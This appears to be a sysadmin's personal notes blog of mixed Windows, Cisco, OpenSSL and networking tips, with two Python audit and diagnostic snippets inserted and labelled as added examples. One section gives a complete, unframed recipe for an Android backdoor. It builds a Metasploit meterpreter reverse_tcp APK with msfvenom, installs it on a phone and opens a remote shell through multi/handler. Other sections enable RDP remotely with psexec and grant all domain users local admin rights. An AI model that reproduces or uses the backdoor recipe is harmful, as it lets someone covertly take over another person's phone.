psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
psexec \\remotecomputername netsh firewall set service remoteadmin enable
psexec \\remotecomputername netsh firewall set service remotedesktop enable
Thursday, December 12, 2019
Local administrator permission for domain user
How to give users in a domain local administrator permission on their computers.
Normally, domain users cannot change control settings, make modifications in the C: drive and Windows, or install applications. Some organizations need to allow this. To do so, proceed as follows.
Edit the Default group policy (or any group policy you are willing to link to the relevant OU).
Go to Computer Configuration > Policies > Windows Settings > Security Settings.
There, right-click Restricted Groups and click Add Group.
Click Browse, type Domain Users (or any other user group you want to add to the local Administrators group) and click Check Names.
Click OK twice.
Click Add under “This group is a member of:”.
Add the “Administrators” group.
Add “Remote Desktop Users” (adding the Remote Desktop Users group gives them the ability to use Remote Desktop; if your domain users don't need this, skip it).
Click OK twice.
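A Restricted Groups setting like the one above is stored in the GPO's GptTmpl.inf file under a [Group Membership] section. The following added example (not part of the original post) parses that section and reports broad groups that a policy nests into the local Administrators group; the sample file content, the domain SID and the function names are constructed for illustration, and principals are assumed to be stored in SID form.

```python
import re

# Targets that mean "local Administrators": well-known SID or the typed name.
ADMIN_TARGETS = {"s-1-5-32-544", "administrators"}
BROAD_SIDS = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users"}
DOMAIN_USERS_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-513$")  # RID 513

# Constructed sample (made-up domain SID); real files are UTF-16 on disk.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Group Membership]
*S-1-5-21-1111111111-2222222222-3333333333-513__Memberof = *S-1-5-32-544,*S-1-5-32-555
*S-1-5-21-1111111111-2222222222-3333333333-513__Members =
*S-1-5-21-1111111111-2222222222-3333333333-1604__Memberof = *S-1-5-32-555
"""

def parse_memberof(inf_text):
    """Map each principal to the groups the policy makes it a member of."""
    result, in_section = {}, False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[group membership]"
            continue
        key, sep, value = line.partition("=")
        key = key.strip()
        if not (in_section and sep and key.lower().endswith("__memberof")):
            continue
        principal = key[: -len("__memberof")].lstrip("*")
        result[principal] = [g.strip().lstrip("*") for g in value.split(",") if g.strip()]
    return result

def broad_admin_grants(inf_text):
    """Return (principal, label) for broad groups nested into Administrators."""
    findings = []
    for principal, groups in parse_memberof(inf_text).items():
        if not ADMIN_TARGETS & {g.lower() for g in groups}:
            continue
        label = BROAD_SIDS.get(principal.upper())
        if label is None and DOMAIN_USERS_RE.match(principal.upper()):
            label = "Domain Users"
        if label:
            findings.append((principal, label))
    return findings

if __name__ == "__main__":
    for sid, label in broad_admin_grants(SAMPLE_INF):
        print(f"{label} ({sid}) is nested into local Administrators")
```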
Convert crt certificate to pfx format.
openssl pkcs12 -export -out certificate.pfx -inkey privateKey.key -in certificate.crt -certfile more.crt
* openssl – the command for executing OpenSSL
* pkcs12 – the file utility for PKCS#12 files in OpenSSL
* -export -out certificate.pfx – export and save the PFX file as certificate.pfx
* -inkey privateKey.key – use the private key file privateKey.key as the private key to combine with the certificate.
* -in certificate.crt – use certificate.crt as the certificate the private key will be combined with.
* -certfile more.crt – optional; use this if you have any additional certificates you would like to include in the PFX file.
Android backdoor apk using metasploit
In terminal,
msfvenom -p android/meterpreter/reverse_tcp LHOST=pc_ip_address LPORT=4444 R > /root/hack.apk
Copy the APK file to the phone and install the app by opening the APK.
run
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost host_ip_address(ex: 192.168.43.18)
set lport 4444
type,
exploit
On the phone, run the installed app.
A meterpreter session will open. Run commands; type help to list the available commands.
IPv4 automatic configuring issue in windows
Step 1: Run > cmd > ipconfig /all
Look to see which IP is the preferred one and whether autoconfiguration is on.
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82567LM-3 Gigabit Network Connection
Physical Address. . . . . . . . . : 00-23-24-08-30-57
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::8508:6cb9:5112:f8c9 (Preferred)
Autoconfiguration IPv4 Address. . : 169.254.248.201(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
IPv4 Address. . . . . . . . . . . : 192.168.1.136(Duplicate)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
DNS Servers . . . . . . . . . . . : 192.168.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
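The check described in Step 1 can be automated. The following added example (not part of the original post) parses `ipconfig /all` text and reports addresses marked Duplicate and 169.254.0.0/16 autoconfiguration addresses that became the preferred one; the sample text is abridged from the output above, and the function names and finding labels are made up for illustration.

```python
import ipaddress
import re

# Constructed sample, abridged from the `ipconfig /all` output on this page.
SAMPLE = """\
Ethernet adapter Local Area Connection:
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Autoconfiguration IPv4 Address. . : 169.254.248.201(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.1.136(Duplicate)
"""

FIELD_RE = re.compile(r"^(?P<label>.+?)[ .]*:\s*(?P<value>.*)$")
ADDR_RE = re.compile(r"^(?P<ip>\d+(?:\.\d+){3})\s*\((?P<state>\w+)\)$")
APIPA = ipaddress.ip_network("169.254.0.0/16")

def parse_adapters(text):
    """Return {adapter: {"fields": {label: value}, "ipv4": [(ip, state)]}}."""
    adapters, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        # Adapter headers end in ':' and, unlike fields, have no dot leaders.
        if line.endswith(":") and ". " not in line and " ." not in line:
            current = adapters.setdefault(line[:-1], {"fields": {}, "ipv4": []})
            continue
        m = FIELD_RE.match(line)
        if current is None or not m:
            continue
        addr = ADDR_RE.match(m["value"])
        if addr and m["label"].endswith("IPv4 Address"):
            current["ipv4"].append((addr["ip"], addr["state"]))
        else:
            current["fields"].setdefault(m["label"], m["value"])
    return adapters

def diagnose(text):
    """Return (adapter, finding, ip) for duplicate and APIPA fallback addresses."""
    findings = []
    for name, info in parse_adapters(text).items():
        for ip, state in info["ipv4"]:
            if state == "Duplicate":
                findings.append((name, "address-conflict", ip))
            elif state == "Preferred" and ipaddress.ip_address(ip) in APIPA:
                findings.append((name, "apipa-fallback", ip))
    return findings

if __name__ == "__main__":
    for finding in diagnose(SAMPLE):
        print(finding)
```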
Cisco switch commands
PoE on:
power inline auto
power inline static
PoE off:
power inline never
Show MAC addresses connected to an interface:
show mac address-table int giga...
Reset cisco switch login
Step 1:
Power off the switch first, then press and hold the mode button while you power on the switch again. Hold it for about 15 seconds until the SYS led is solid green, and then release it.
The switch should then give you this prompt:
switch:
Step 2:
To initialize the flash file system, run the command:
switch: flash_init
Initializing Flash...
flashfs[0]: 5 files, 1 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 32514048
flashfs[0]: Bytes used: 8059904
flashfs[0]: Bytes available: 24454144
flashfs[0]: flashfs fsck took 10 seconds.
...done Initializing Flash.
The switch will now print a number of messages about the flash memory; one of them should be ‘done Initializing Flash’, as shown above.
Step 3:
You can now list the contents of your flash by running
switch: dir flash:
Directory of flash: /
2 -rwx 12300 config.text
4 -rwx 1906 private-config.text
5 -rwx 676 vlan.dat
6 -rwx 8040418 c2960-lanbasek9-mz.122-50.SE3.bin
7 -rwx 2072 multiple-fs
There should be a file named ‘config.text’. Rename this file as follows:
switch: rename flash:config.text flash:oldconfig.backup
Step 4:
To further boot the switch run the boot command as:
switch: boot
This will start the boot you are used to. When the switch has booted up, you will find that the configuration is gone, but you are now enabled on the switch.
Step 5:
Now change the passwords,
Switch#configure terminal
Switch(config)#line console 0
Switch(config-line)#password yourpassword
Switch(config-line)#line vty 0 4
Switch(config-line)#password yourpassword
Switch(config-line)#exit
Switch(config)#enable password yourpassword
Switch(config)#end
Switch#copy running-config startup-config